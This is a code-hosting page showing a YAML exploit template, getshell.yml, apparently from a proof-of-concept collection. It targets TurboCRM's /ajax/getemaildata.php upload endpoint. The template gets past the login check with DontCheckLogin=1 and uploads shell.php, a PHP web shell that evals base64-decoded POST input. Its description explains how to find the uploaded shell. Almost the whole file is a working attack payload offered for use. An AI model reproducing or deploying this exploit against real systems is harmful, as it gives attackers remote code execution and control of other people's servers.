f0ng/poc2jar
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
cd45c3ad210ef5050e2308115e5a1bec350e3c97
poc2jar/poc/turbocrm/getshell.yml
f0ng cd45c3ad21 Add files via upload 
首次上传
2021-07-03 12:13:34 +08:00

35 lines
1.2 KiB
YAML
Raw Blame History

method: POST
url: $
tlsversion: HTTP/1.1
uri: /ajax/getemaildata.php
param: DontCheckLogin=1
data: |
-----------------------------344329421119612311021814993770
Content-Disposition: form-data; name="file"; filename="shell.php "
Content-Type: text/php
<?php
@eval(base64_decode(($_POST['x'])));
?>
-----------------------------344329421119612311021814993770
Content-Disposition: form-data; name="upload"
upload
-----------------------------344329421119612311021814993770--
others:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8'
Accept-Language: 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2'
Accept-Encoding: gzip, deflate
Content-Type: 'multipart/form-data; boundary=---------------------------344329421119612311021814993770'
Content-Length: 386
Connection: keep-alive
Cookie: 'PHPSESSID=c7vlvgf1hhc8uat6r2nnu57333'
Upgrade-Insecure-Requests: 1
condition:
words: tmpfile
time:
expinformation:
expname: TurboCRM任意文件上传
expdescribe: TurboCRM任意文件上传,路径为返回的tmpfile/mh70D7.tmp.mht换为tmpfile/upd70D6.tmp.php
Reference in New Issue View Git Blame Copy Permalink